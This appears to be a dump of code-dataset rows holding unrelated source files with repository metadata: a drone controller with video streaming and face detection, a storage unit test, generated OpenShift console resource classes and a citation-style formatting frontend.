# may be used to endorse or promote products derived from this software
# without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE
# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT
# OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
"""Fichier contenant le type clef."""
from .base import BaseType
class Clef(BaseType):
"""Type d'objet: clef.
"""
nom_type = "clef"
| 41.095238
| 79
| 0.75956
|
cc44f245ecfa52f04753837ac46d0c1dfdd6c373
| 9,368
|
py
|
Python
|
drone/8_facedtect_webcamera/36_face_detect/droneapp/models/drone_manager.py
|
onselaydin/pytry
|
314aa50b6f8535e275dc8a2edd0c21637fb5a745
|
[
"Apache-2.0"
] | null | null | null |
drone/8_facedtect_webcamera/36_face_detect/droneapp/models/drone_manager.py
|
onselaydin/pytry
|
314aa50b6f8535e275dc8a2edd0c21637fb5a745
|
[
"Apache-2.0"
] | null | null | null |
drone/8_facedtect_webcamera/36_face_detect/droneapp/models/drone_manager.py
|
onselaydin/pytry
|
314aa50b6f8535e275dc8a2edd0c21637fb5a745
|
[
"Apache-2.0"
] | null | null | null |
import logging
import contextlib
import os
import socket
import subprocess
import threading
import time
import cv2 as cv
import numpy as np
from droneapp.models.base import Singleton
logger = logging.getLogger(__name__)
DEFAULT_DISTANCE = 0.30
DEFAULT_SPEED = 10
DEFAULT_DEGREE = 10
FRAME_X = int(960/3)
FRAME_Y = int(720/3)
FRAME_AREA = FRAME_X * FRAME_Y
FRAME_SIZE = FRAME_AREA * 3
FRAME_CENTER_X = FRAME_X / 2
FRAME_CENTER_Y = FRAME_Y / 2
CMD_FFMPEG = (f'ffmpeg -hwaccel auto -hwaccel_device opencl -i pipe:0 '
f'-pix_fmt bgr24 -s {FRAME_X}x{FRAME_Y} -f rawvideo pipe:1')
FACE_DETECT_XML_FILE = './droneapp/models/haarcascade_frontalface_default.xml'
class ErrorNoFaceDetectXMLFile(Exception):
"""Error no face detect xml file"""
class DroneManager(metaclass=Singleton):
def __init__(self, host_ip='192.168.10.2', host_port=8889,
drone_ip='192.168.10.1', drone_port=8889,
is_imperial=False, speed=DEFAULT_SPEED):
self.host_ip = host_ip
self.host_port = host_port
self.drone_ip = drone_ip
self.drone_port = drone_port
self.drone_address = (drone_ip, drone_port)
self.is_imperial = is_imperial
self.speed = speed
self.socket = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
self.socket.bind((self.host_ip, self.host_port))
self.response = None
self.stop_event = threading.Event()
self._response_thread = threading.Thread(target=self.receive_response,
args=(self.stop_event, ))
self._response_thread.start()
self.patrol_event = None
self.is_patrol = False
self._patrol_semaphore = threading.Semaphore(1)
self._thread_patrol = None
self.proc = subprocess.Popen(CMD_FFMPEG.split(' '),
stdin=subprocess.PIPE,
stdout=subprocess.PIPE)
self.proc_stdin = self.proc.stdin
self.proc_stdout = self.proc.stdout
self.video_port = 11111
self._receive_video_thread = threading.Thread(
target=self.receive_video,
args=(self.stop_event, self.proc_stdin,
self.host_ip, self.video_port,))
self._receive_video_thread.start()
if not os.path.exists(FACE_DETECT_XML_FILE):
raise ErrorNoFaceDetectXMLFile(f'No {FACE_DETECT_XML_FILE}')
self.face_cascade = cv.CascadeClassifier(FACE_DETECT_XML_FILE)
self._is_enable_face_detect = False
self.send_command('command')
self.send_command('streamon')
self.set_speed(self.speed)
def receive_response(self, stop_event):
while not stop_event.is_set():
try:
self.response, ip = self.socket.recvfrom(3000)
logger.info({'action': 'receive_response',
'response': self.response})
except socket.error as ex:
logger.error({'action': 'receive_response',
'ex': ex})
break
def __dell__(self):
self.stop()
def stop(self):
self.stop_event.set()
retry = 0
while self._response_thread.isAlive():
time.sleep(0.3)
if retry > 30:
break
retry += 1
self.socket.close()
os.kill(self.proc.pid, 9)
# Windows
# import signal
# os.kill(self.proc.pid, signal.CTRL_C_EVENT)
def send_command(self, command):
logger.info({'action': 'send_command', 'command': command})
self.socket.sendto(command.encode('utf-8'), self.drone_address)
retry = 0
while self.response is None:
time.sleep(0.3)
if retry > 3:
break
retry += 1
if self.response is None:
response = None
else:
response = self.response.decode('utf-8')
self.response = None
return response
def takeoff(self):
return self.send_command('takeoff')
def land(self):
return self.send_command('land')
def move(self, direction, distance):
distance = float(distance)
if self.is_imperial:
distance = int(round(distance * 30.48))
else:
distance = int(round(distance * 100))
return self.send_command(f'{direction} {distance}')
def up(self, distance=DEFAULT_DISTANCE):
return self.move('up', distance)
def down(self, distance=DEFAULT_DISTANCE):
return self.move('down', distance)
def left(self, distance=DEFAULT_DISTANCE):
return self.move('left', distance)
def right(self, distance=DEFAULT_DISTANCE):
return self.move('right', distance)
def forward(self, distance=DEFAULT_DISTANCE):
return self.move('forward', distance)
def back(self, distance=DEFAULT_DISTANCE):
return self.move('back', distance)
def set_speed(self, speed):
return self.send_command(f'speed {speed}')
def clockwise(self, degree=DEFAULT_DEGREE):
return self.send_command(f'cw {degree}')
def counter_clockwise(self, degree=DEFAULT_DEGREE):
return self.send_command(f'ccw {degree}')
def flip_front(self):
return self.send_command('flip f')
def flip_back(self):
return self.send_command('flip b')
def flip_left(self):
return self.send_command('flip l')
def flip_right(self):
return self.send_command('flip r')
def patrol(self):
if not self.is_patrol:
self.patrol_event = threading.Event()
self._thread_patrol = threading.Thread(
target=self._patrol,
args=(self._patrol_semaphore, self.patrol_event,))
self._thread_patrol.start()
self.is_patrol = True
def stop_patrol(self):
if self.is_patrol:
self.patrol_event.set()
retry = 0
while self._thread_patrol.isAlive():
time.sleep(0.3)
if retry > 300:
break
retry += 1
self.is_patrol = False
def _patrol(self, semaphore, stop_event):
is_acquire = semaphore.acquire(blocking=False)
if is_acquire:
logger.info({'action': '_patrol', 'status': 'acquire'})
with contextlib.ExitStack() as stack:
stack.callback(semaphore.release)
status = 0
while not stop_event.is_set():
status += 1
if status == 1:
self.up()
if status == 2:
self.clockwise(90)
if status == 3:
self.down()
if status == 4:
status = 0
time.sleep(5)
else:
logger.warning({'action': '_patrol', 'status': 'not_acquire'})
def receive_video(self, stop_event, pipe_in, host_ip, video_port):
with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as sock_video:
sock_video.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
sock_video.settimeout(.5)
sock_video.bind((host_ip, video_port))
data = bytearray(2048)
while not stop_event.is_set():
try:
size, addr = sock_video.recvfrom_into(data)
# logger.info({'action': 'receive_video', 'data': data})
except socket.timeout as ex:
logger.warning({'action': 'receive_video', 'ex': ex })
time.sleep(0.5)
continue
except socket.error as ex:
logger.error({'action': 'receive_video', 'ex': ex})
break
try:
pipe_in.write(data[:size])
pipe_in.flush()
except Exception as ex:
logger.error({'action': 'receive_video', 'ex': ex})
break
def video_binary_generator(self):
while True:
try:
frame = self.proc_stdout.read(FRAME_SIZE)
except Exception as ex:
logger.error({'action': 'video_binary_generator', 'ex': ex})
continue
if not frame:
continue
frame = np.fromstring(frame, np.uint8).reshape(FRAME_Y, FRAME_X, 3)
yield frame
def enable_face_detect(self):
self._is_enable_face_detect = True
def disable_face_detect(self):
self._is_enable_face_detect = False
def video_jpeg_generator(self):
for frame in self.video_binary_generator():
if self._is_enable_face_detect:
if self.is_patrol:
self.stop_patrol()
gray = cv.cvtColor(frame, cv.COLOR_BGR2GRAY)
faces = self.face_cascade.detectMultiScale(gray, 1.3, 5)
for (x, y, w, h) in faces:
cv.rectangle(frame, (x, y), (x+w, y+h), (255, 0, 0), 2)
break
_, jpeg = cv.imencode('.jpg', frame)
jpeg_binary = jpeg.tobytes()
yield jpeg_binary
| 32.19244
| 79
| 0.568638
|
2608581b7e83b8558c298c7d0b6b338364685ede
| 712
|
py
|
Python
|
qac/test/test_storage.py
|
jantrienes/ecir2019-qac
|
7d6dea5af85fc97d115cbf804365e04c8eed1111
|
[
"MIT"
] | 11
|
2019-03-06T06:49:10.000Z
|
2020-01-16T06:53:54.000Z
|
qac/test/test_storage.py
|
jantrienes/ecir2019-qac
|
7d6dea5af85fc97d115cbf804365e04c8eed1111
|
[
"MIT"
] | null | null | null |
qac/test/test_storage.py
|
jantrienes/ecir2019-qac
|
7d6dea5af85fc97d115cbf804365e04c8eed1111
|
[
"MIT"
] | 3
|
2019-04-26T06:49:20.000Z
|
2020-06-05T12:35:02.000Z
|
# pylint: disable=protected-access
from qac.storage import base
class TestStorage(object):
storage = base.Storage(db='stackexchange_test')
@classmethod
def setup_class(cls):
cls.storage._db['users'].delete_many({})
@classmethod
def teardown_class(cls):
cls.storage._db['users'].delete_many({})
def test_users(self):
assert not list(self.storage.users())
self.storage.add_user('john')
self.storage.add_user('jane')
users = list(self.storage.users())
assert len(users) == 2
assert len(list(filter(lambda u: u['name'] == 'john', users))) == 1
assert len(list(filter(lambda u: u['name'] == 'jane', users))) == 1
| 26.37037
| 75
| 0.622191
|
980f174acd23503df9eca5d886065699d610a75c
| 24,199
|
py
|
Python
|
kubespec/openshift/console/v1.py
|
machinezone/kubespec
|
0d493d8d834643968d7c852c561e6c634c8c1556
|
[
"BSD-3-Clause"
] | 7
|
2019-10-22T14:21:16.000Z
|
2021-03-18T15:57:41.000Z
|
kubespec/openshift/console/v1.py
|
machinezone/kubespec
|
0d493d8d834643968d7c852c561e6c634c8c1556
|
[
"BSD-3-Clause"
] | null | null | null |
kubespec/openshift/console/v1.py
|
machinezone/kubespec
|
0d493d8d834643968d7c852c561e6c634c8c1556
|
[
"BSD-3-Clause"
] | null | null | null |
# Code is generated: DO NOT EDIT
# Copyright 2019 Machine Zone, Inc. All rights reserved.
# Use of this source code is governed by a BSD-style
# license that can be found in the LICENSE file.
from kubespec import context
from kubespec import types
from kubespec.k8s import base
from kubespec.k8s.meta import v1 as metav1
from typeguard import check_type, typechecked
from typing import Any, Dict, List, Optional
# ConsoleLinkLocationSelector is a set of possible menu targets to which a link may be appended.
ConsoleLinkLocation = base.Enum(
"ConsoleLinkLocation",
{
# ApplicationMenu indicates that the link should appear inside the application menu of the console.
"ApplicationMenu": "ApplicationMenu",
# HelpMenu indicates that the link should appear in the help menu in the console.
"HelpMenu": "HelpMenu",
# NamespaceDashboard indicates that the link should appear in the namespaced dashboard of the console.
"NamespaceDashboard": "NamespaceDashboard",
# UserMenu indicates that the link should appear in the user menu in the console.
"UserMenu": "UserMenu",
},
)
# ConsoleNotificationLocationSelector is a set of possible notification targets
# to which a notification may be appended.
ConsoleNotificationLocation = base.Enum(
"ConsoleNotificationLocation",
{
# BannerBottom indicates that the notification should appear at the bottom of the console.
"BannerBottom": "BannerBottom",
# BannerTop indicates that the notification should appear at the top of the console.
"BannerTop": "BannerTop",
# BannerTopBottom indicates that the notification should appear both at the top and at the bottom of the console.
"BannerTopBottom": "BannerTopBottom",
},
)
# ConsoleYAMLSampleDescription of the YAML sample.
ConsoleYAMLSampleDescription = base.Enum("ConsoleYAMLSampleDescription", {})
# ConsoleYAMLSampleTitle of the YAML sample.
ConsoleYAMLSampleTitle = base.Enum("ConsoleYAMLSampleTitle", {})
# ConsoleYAMLSampleYAML is the YAML sample to display.
ConsoleYAMLSampleYAML = base.Enum("ConsoleYAMLSampleYAML", {})
class ApplicationMenuSpec(types.Object):
"""
ApplicationMenuSpec is the specification of the desired section and icon used for the link in the application menu.
"""
@context.scoped
@typechecked
def __init__(self, section: str = "", image_url: str = None):
super().__init__()
self.__section = section
self.__image_url = image_url
@typechecked
def _root(self) -> Dict[str, Any]:
v = super()._root()
section = self.section()
check_type("section", section, str)
v["section"] = section
image_url = self.image_url()
check_type("image_url", image_url, Optional[str])
if image_url: # omit empty
v["imageURL"] = image_url
return v
def section(self) -> str:
"""
section is the section of the application menu in which the link should appear.
This can be any text that will appear as a subheading in the application menu dropdown.
A new section will be created if the text does not match text of an existing section.
"""
return self.__section
def image_url(self) -> Optional[str]:
"""
imageUrl is the URL for the icon used in front of the link in the application menu.
The URL must be an HTTPS URL or a Data URI. The image should be square and will be shown at 24x24 pixels.
"""
return self.__image_url
class CLIDownloadLink(types.Object):
@context.scoped
@typechecked
def __init__(self, text: str = "", href: str = ""):
super().__init__()
self.__text = text
self.__href = href
@typechecked
def _root(self) -> Dict[str, Any]:
v = super()._root()
text = self.text()
check_type("text", text, str)
v["text"] = text
href = self.href()
check_type("href", href, str)
v["href"] = href
return v
def text(self) -> str:
"""
text is the display text for the link
"""
return self.__text
def href(self) -> str:
"""
href is the absolute secure URL for the link (must use https)
"""
return self.__href
class ConsoleCLIDownloadSpec(types.Object):
"""
ConsoleCLIDownloadSpec is the desired cli download configuration.
"""
@context.scoped
@typechecked
def __init__(
self,
display_name: str = "",
description: str = "",
links: List["CLIDownloadLink"] = None,
):
super().__init__()
self.__display_name = display_name
self.__description = description
self.__links = links if links is not None else []
@typechecked
def _root(self) -> Dict[str, Any]:
v = super()._root()
display_name = self.display_name()
check_type("display_name", display_name, str)
v["displayName"] = display_name
description = self.description()
check_type("description", description, str)
v["description"] = description
links = self.links()
check_type("links", links, List["CLIDownloadLink"])
v["links"] = links
return v
def display_name(self) -> str:
"""
displayName is the display name of the CLI download.
"""
return self.__display_name
def description(self) -> str:
"""
description is the description of the CLI download (can include markdown).
"""
return self.__description
def links(self) -> List["CLIDownloadLink"]:
"""
links is a list of objects that provide CLI download link details.
"""
return self.__links
class ConsoleCLIDownload(base.TypedObject, base.MetadataObject):
"""
ConsoleCLIDownload is an extension for configuring openshift web console command line interface (CLI) downloads.
"""
@context.scoped
@typechecked
def __init__(
self,
name: str = None,
labels: Dict[str, str] = None,
annotations: Dict[str, str] = None,
spec: "ConsoleCLIDownloadSpec" = None,
):
super().__init__(
api_version="console.openshift.io/v1",
kind="ConsoleCLIDownload",
**({"name": name} if name is not None else {}),
**({"labels": labels} if labels is not None else {}),
**({"annotations": annotations} if annotations is not None else {}),
)
self.__spec = spec if spec is not None else ConsoleCLIDownloadSpec()
@typechecked
def _root(self) -> Dict[str, Any]:
v = super()._root()
spec = self.spec()
check_type("spec", spec, "ConsoleCLIDownloadSpec")
v["spec"] = spec
return v
def spec(self) -> "ConsoleCLIDownloadSpec":
return self.__spec
class ConsoleExternalLogLinkSpec(types.Object):
"""
ConsoleExternalLogLinkSpec is the desired log link configuration.
The log link will appear on the logs tab of the pod details page.
"""
@context.scoped
@typechecked
def __init__(
self, text: str = "", href_template: str = "", namespace_filter: str = None
):
super().__init__()
self.__text = text
self.__href_template = href_template
self.__namespace_filter = namespace_filter
@typechecked
def _root(self) -> Dict[str, Any]:
v = super()._root()
text = self.text()
check_type("text", text, str)
v["text"] = text
href_template = self.href_template()
check_type("href_template", href_template, str)
v["hrefTemplate"] = href_template
namespace_filter = self.namespace_filter()
check_type("namespace_filter", namespace_filter, Optional[str])
if namespace_filter: # omit empty
v["namespaceFilter"] = namespace_filter
return v
def text(self) -> str:
"""
text is the display text for the link
"""
return self.__text
def href_template(self) -> str:
"""
hrefTemplate is an absolute secure URL (must use https) for the log link including
variables to be replaced. Variables are specified in the URL with the format ${variableName},
for instance, ${containerName} and will be replaced with the corresponding values
from the resource. Resource is a pod.
Supported variables are:
- ${resourceName} - name of the resource which containes the logs
- ${resourceUID} - UID of the resource which contains the logs
- e.g. `11111111-2222-3333-4444-555555555555`
- ${containerName} - name of the resource's container that contains the logs
- ${resourceNamespace} - namespace of the resource that contains the logs
- ${resourceNamespaceUID} - namespace UID of the resource that contains the logs
- ${podLabels} - JSON representation of labels matching the pod with the logs
- e.g. `{"key1":"value1","key2":"value2"}`
e.g., https://example.com/logs?resourceName=${resourceName}&containerName=${containerName}&resourceNamespace=${resourceNamespace}&podLabels=${podLabels}
"""
return self.__href_template
def namespace_filter(self) -> Optional[str]:
"""
namespaceFilter is a regular expression used to restrict a log link to a
matching set of namespaces (e.g., `^openshift-`). The string is converted
into a regular expression using the JavaScript RegExp constructor.
If not specified, links will be displayed for all the namespaces.
"""
return self.__namespace_filter
class ConsoleExternalLogLink(base.TypedObject, base.MetadataObject):
"""
ConsoleExternalLogLink is an extension for customizing OpenShift web console log links.
"""
@context.scoped
@typechecked
def __init__(
self,
name: str = None,
labels: Dict[str, str] = None,
annotations: Dict[str, str] = None,
spec: "ConsoleExternalLogLinkSpec" = None,
):
super().__init__(
api_version="console.openshift.io/v1",
kind="ConsoleExternalLogLink",
**({"name": name} if name is not None else {}),
**({"labels": labels} if labels is not None else {}),
**({"annotations": annotations} if annotations is not None else {}),
)
self.__spec = spec if spec is not None else ConsoleExternalLogLinkSpec()
@typechecked
def _root(self) -> Dict[str, Any]:
v = super()._root()
spec = self.spec()
check_type("spec", spec, "ConsoleExternalLogLinkSpec")
v["spec"] = spec
return v
def spec(self) -> "ConsoleExternalLogLinkSpec":
return self.__spec
class Link(types.Object):
"""
Represents a standard link that could be generated in HTML
"""
@context.scoped
@typechecked
def __init__(self, text: str = "", href: str = ""):
super().__init__()
self.__text = text
self.__href = href
@typechecked
def _root(self) -> Dict[str, Any]:
v = super()._root()
text = self.text()
check_type("text", text, str)
v["text"] = text
href = self.href()
check_type("href", href, str)
v["href"] = href
return v
def text(self) -> str:
"""
text is the display text for the link
"""
return self.__text
def href(self) -> str:
"""
href is the absolute secure URL for the link (must use https)
"""
return self.__href
class NamespaceDashboardSpec(types.Object):
"""
NamespaceDashboardSpec is a specification of namespaces in which the dashboard link should appear.
If both namespaces and namespaceSelector are specified, the link will appear in namespaces that match either
"""
@context.scoped
@typechecked
def __init__(
self,
namespaces: List[str] = None,
namespace_selector: "metav1.LabelSelector" = None,
):
super().__init__()
self.__namespaces = namespaces if namespaces is not None else []
self.__namespace_selector = namespace_selector
@typechecked
def _root(self) -> Dict[str, Any]:
v = super()._root()
namespaces = self.namespaces()
check_type("namespaces", namespaces, Optional[List[str]])
if namespaces: # omit empty
v["namespaces"] = namespaces
namespace_selector = self.namespace_selector()
check_type(
"namespace_selector", namespace_selector, Optional["metav1.LabelSelector"]
)
if namespace_selector is not None: # omit empty
v["namespaceSelector"] = namespace_selector
return v
def namespaces(self) -> Optional[List[str]]:
"""
namespaces is an array of namespace names in which the dashboard link should appear.
"""
return self.__namespaces
def namespace_selector(self) -> Optional["metav1.LabelSelector"]:
"""
namespaceSelector is used to select the Namespaces that should contain dashboard link by label.
If the namespace labels match, dashboard link will be shown for the namespaces.
"""
return self.__namespace_selector
class ConsoleLinkSpec(types.Object):
"""
ConsoleLinkSpec is the desired console link configuration.
"""
@context.scoped
@typechecked
def __init__(
self,
link: "Link" = None,
location: ConsoleLinkLocation = None,
application_menu: "ApplicationMenuSpec" = None,
namespace_dashboard: "NamespaceDashboardSpec" = None,
):
super().__init__()
self.__link = link if link is not None else Link()
self.__location = location
self.__application_menu = application_menu
self.__namespace_dashboard = namespace_dashboard
@typechecked
def _root(self) -> Dict[str, Any]:
v = super()._root()
link = self.link()
check_type("link", link, "Link")
v.update(link._root()) # inline
location = self.location()
check_type("location", location, ConsoleLinkLocation)
v["location"] = location
application_menu = self.application_menu()
check_type(
"application_menu", application_menu, Optional["ApplicationMenuSpec"]
)
if application_menu is not None: # omit empty
v["applicationMenu"] = application_menu
namespace_dashboard = self.namespace_dashboard()
check_type(
"namespace_dashboard",
namespace_dashboard,
Optional["NamespaceDashboardSpec"],
)
if namespace_dashboard is not None: # omit empty
v["namespaceDashboard"] = namespace_dashboard
return v
def link(self) -> "Link":
return self.__link
def location(self) -> ConsoleLinkLocation:
"""
location determines which location in the console the link will be appended to (ApplicationMenu, HelpMenu, UserMenu, NamespaceDashboard).
"""
return self.__location
def application_menu(self) -> Optional["ApplicationMenuSpec"]:
"""
applicationMenu holds information about section and icon used for the link in the
application menu, and it is applicable only when location is set to ApplicationMenu.
"""
return self.__application_menu
def namespace_dashboard(self) -> Optional["NamespaceDashboardSpec"]:
"""
namespaceDashboard holds information about namespaces in which the dashboard link should
appear, and it is applicable only when location is set to NamespaceDashboard.
If not specified, the link will appear in all namespaces.
"""
return self.__namespace_dashboard
class ConsoleLink(base.TypedObject, base.MetadataObject):
"""
ConsoleLink is an extension for customizing OpenShift web console links.
"""
@context.scoped
@typechecked
def __init__(
self,
name: str = None,
labels: Dict[str, str] = None,
annotations: Dict[str, str] = None,
spec: "ConsoleLinkSpec" = None,
):
super().__init__(
api_version="console.openshift.io/v1",
kind="ConsoleLink",
**({"name": name} if name is not None else {}),
**({"labels": labels} if labels is not None else {}),
**({"annotations": annotations} if annotations is not None else {}),
)
self.__spec = spec if spec is not None else ConsoleLinkSpec()
@typechecked
def _root(self) -> Dict[str, Any]:
v = super()._root()
spec = self.spec()
check_type("spec", spec, "ConsoleLinkSpec")
v["spec"] = spec
return v
def spec(self) -> "ConsoleLinkSpec":
return self.__spec
class ConsoleNotificationSpec(types.Object):
"""
ConsoleNotificationSpec is the desired console notification configuration.
"""
@context.scoped
@typechecked
def __init__(
self,
text: str = "",
location: ConsoleNotificationLocation = None,
link: "Link" = None,
color: str = None,
background_color: str = None,
):
super().__init__()
self.__text = text
self.__location = location
self.__link = link
self.__color = color
self.__background_color = background_color
@typechecked
def _root(self) -> Dict[str, Any]:
v = super()._root()
text = self.text()
check_type("text", text, str)
v["text"] = text
location = self.location()
check_type("location", location, Optional[ConsoleNotificationLocation])
if location: # omit empty
v["location"] = location
link = self.link()
check_type("link", link, Optional["Link"])
if link is not None: # omit empty
v["link"] = link
color = self.color()
check_type("color", color, Optional[str])
if color: # omit empty
v["color"] = color
background_color = self.background_color()
check_type("background_color", background_color, Optional[str])
if background_color: # omit empty
v["backgroundColor"] = background_color
return v
def text(self) -> str:
"""
text is the visible text of the notification.
"""
return self.__text
def location(self) -> Optional[ConsoleNotificationLocation]:
"""
location is the location of the notification in the console.
"""
return self.__location
def link(self) -> Optional["Link"]:
"""
link is an object that holds notification link details.
"""
return self.__link
def color(self) -> Optional[str]:
"""
color is the color of the text for the notification as CSS data type color.
"""
return self.__color
def background_color(self) -> Optional[str]:
"""
backgroundColor is the color of the background for the notification as CSS data type color.
"""
return self.__background_color
class ConsoleNotification(base.TypedObject, base.MetadataObject):
"""
ConsoleNotification is the extension for configuring openshift web console notifications.
"""
@context.scoped
@typechecked
def __init__(
self,
name: str = None,
labels: Dict[str, str] = None,
annotations: Dict[str, str] = None,
spec: "ConsoleNotificationSpec" = None,
):
super().__init__(
api_version="console.openshift.io/v1",
kind="ConsoleNotification",
**({"name": name} if name is not None else {}),
**({"labels": labels} if labels is not None else {}),
**({"annotations": annotations} if annotations is not None else {}),
)
self.__spec = spec if spec is not None else ConsoleNotificationSpec()
@typechecked
def _root(self) -> Dict[str, Any]:
v = super()._root()
spec = self.spec()
check_type("spec", spec, "ConsoleNotificationSpec")
v["spec"] = spec
return v
def spec(self) -> "ConsoleNotificationSpec":
return self.__spec
class ConsoleYAMLSampleSpec(types.Object):
"""
ConsoleYAMLSampleSpec is the desired YAML sample configuration.
Samples will appear with their descriptions in a samples sidebar
when creating a resources in the web console.
"""
@context.scoped
@typechecked
def __init__(
self,
target_resource: "metav1.TypeMeta" = None,
title: ConsoleYAMLSampleTitle = None,
description: ConsoleYAMLSampleDescription = None,
yaml: ConsoleYAMLSampleYAML = None,
snippet: bool = False,
):
super().__init__()
self.__target_resource = (
target_resource if target_resource is not None else metav1.TypeMeta()
)
self.__title = title
self.__description = description
self.__yaml = yaml
self.__snippet = snippet
@typechecked
def _root(self) -> Dict[str, Any]:
v = super()._root()
target_resource = self.target_resource()
check_type("target_resource", target_resource, "metav1.TypeMeta")
v["targetResource"] = target_resource
title = self.title()
check_type("title", title, ConsoleYAMLSampleTitle)
v["title"] = title
description = self.description()
check_type("description", description, ConsoleYAMLSampleDescription)
v["description"] = description
yaml = self.yaml()
check_type("yaml", yaml, ConsoleYAMLSampleYAML)
v["yaml"] = yaml
snippet = self.snippet()
check_type("snippet", snippet, bool)
v["snippet"] = snippet
return v
def target_resource(self) -> "metav1.TypeMeta":
"""
targetResource contains apiVersion and kind of the resource
YAML sample is representating.
"""
return self.__target_resource
def title(self) -> ConsoleYAMLSampleTitle:
"""
title of the YAML sample.
"""
return self.__title
def description(self) -> ConsoleYAMLSampleDescription:
"""
description of the YAML sample.
"""
return self.__description
def yaml(self) -> ConsoleYAMLSampleYAML:
"""
yaml is the YAML sample to display.
"""
return self.__yaml
def snippet(self) -> bool:
"""
snippet indicates that the YAML sample is not the full YAML resource
definition, but a fragment that can be inserted into the existing
YAML document at the user's cursor.
"""
return self.__snippet
class ConsoleYAMLSample(base.TypedObject, base.MetadataObject):
"""
ConsoleYAMLSample is an extension for customizing OpenShift web console YAML samples.
"""
@context.scoped
@typechecked
def __init__(
self,
name: str = None,
labels: Dict[str, str] = None,
annotations: Dict[str, str] = None,
spec: "ConsoleYAMLSampleSpec" = None,
):
super().__init__(
api_version="console.openshift.io/v1",
kind="ConsoleYAMLSample",
**({"name": name} if name is not None else {}),
**({"labels": labels} if labels is not None else {}),
**({"annotations": annotations} if annotations is not None else {}),
)
self.__spec = spec if spec is not None else ConsoleYAMLSampleSpec()
@typechecked
def _root(self) -> Dict[str, Any]:
v = super()._root()
spec = self.spec()
check_type("spec", spec, "ConsoleYAMLSampleSpec")
v["spec"] = spec
return v
def spec(self) -> "ConsoleYAMLSampleSpec":
return self.__spec
| 33.103967
| 160
| 0.620356
|
bf89f791a5068233a584dbf1f3f6bd57faa9490b
| 3,781
|
py
|
Python
|
citeproc/frontend.py
|
phfaist/citeproc-py
|
3748be5bb945e5d7e47579a619dd49a1f039f075
|
[
"BSD-2-Clause-FreeBSD"
] | 84
|
2015-01-03T15:06:06.000Z
|
2022-02-12T09:57:41.000Z
|
citeproc/frontend.py
|
phfaist/citeproc-py
|
3748be5bb945e5d7e47579a619dd49a1f039f075
|
[
"BSD-2-Clause-FreeBSD"
] | 96
|
2015-01-16T14:57:47.000Z
|
2022-02-25T13:47:09.000Z
|
citeproc/frontend.py
|
phfaist/citeproc-py
|
3748be5bb945e5d7e47579a619dd49a1f039f075
|
[
"BSD-2-Clause-FreeBSD"
] | 37
|
2015-01-28T21:55:56.000Z
|
2021-11-15T02:12:40.000Z
|
import os
from warnings import warn
from lxml import etree
from . import SCHEMA_PATH, LOCALES_PATH, STYLES_PATH
from .model import CitationStylesElement
from .formatter import html
class CitationStylesXML(object):
def __init__(self, f, validate=True):
lookup = etree.ElementNamespaceClassLookup()
namespace = lookup.get_namespace('http://purl.org/net/xbiblio/csl')
namespace[None] = CitationStylesElement
namespace.update(dict([(cls.__name__.replace('_', '-').lower(), cls)
for cls in CitationStylesElement.__subclasses__()]))
self.parser = etree.XMLParser(remove_comments=True, encoding='UTF-8',
no_network=True)
self.parser.set_element_class_lookup(lookup)
self.xml = etree.parse(f, self.parser)#, base_url=".")
if validate:
self.schema = etree.RelaxNG(etree.parse(SCHEMA_PATH))
if not self.schema.validate(self.xml):
err = self.schema.error_log
#raise Exception("XML file didn't pass schema validation:\n%s" % err)
warn("XML file didn't pass schema validation:\n%s" % err)
# TODO: proper error reporting
self.root = self.xml.getroot()
class CitationStylesLocale(CitationStylesXML):
def __init__(self, locale, validate=True):
locale_path = os.path.join(LOCALES_PATH, 'locales-{}.xml'.format(locale))
try:
super(CitationStylesLocale, self).__init__(locale_path,
validate=validate)
except IOError:
raise ValueError("'{}' is not a known locale".format(locale))
class CitationStylesStyle(CitationStylesXML):
def __init__(self, style, locale=None, validate=True):
try:
if not os.path.exists(style):
style = os.path.join(STYLES_PATH, '{}.csl'.format(style))
except TypeError:
pass
try:
super(CitationStylesStyle, self).__init__(
style, validate=validate)
except IOError:
raise ValueError("'{}' is not a known style".format(style))
if locale is None:
locale = self.root.get('default-locale', 'en-US')
self.root.set_locale_list(locale, validate=validate)
def has_bibliography(self):
return self.root.bibliography is not None
def render_citation(self, citation, cites, callback=None):
return self.root.citation.render(citation, cites, callback)
def sort_bibliography(self, citation_items):
return self.root.bibliography.sort(citation_items)
def render_bibliography(self, citation_items):
return self.root.bibliography.render(citation_items)
class CitationStylesBibliography(object):
def __init__(self, style, source, formatter=html):
self.style = style
self.source = source
self.formatter = self.style.root.formatter = formatter
self.keys = []
self.items = []
self._cites = []
def register(self, citation, callback=None):
citation.bibliography = self
for item in citation.cites:
if item.key in self.source:
if item.key not in self.keys:
self.keys.append(item.key)
self.items.append(item)
elif callback is not None:
callback(item)
def sort(self):
self.items = self.style.sort_bibliography(self.items)
self.keys = [item.key for item in self.items]
def cite(self, citation, callback):
return self.style.render_citation(citation, self._cites, callback)
def bibliography(self):
return self.style.render_bibliography(self.items)
| 37.068627
| 85
| 0.626025
|
f96af9a0c348f9f4aa9dbd7d04c1359ad1322266
| 15,360
|
py
|
Python
|
adnc/model/mann.py
|
carusyte/ADNC
|
4a5dfa5be1aca9f815794c2c276ec220a1eb591d
|
[
"Apache-2.0"
] | 62
|
2018-07-05T13:55:13.000Z
|
2019-01-03T15:58:07.000Z
|
adnc/model/mann.py
|
carusyte/ADNC
|
4a5dfa5be1aca9f815794c2c276ec220a1eb591d
|
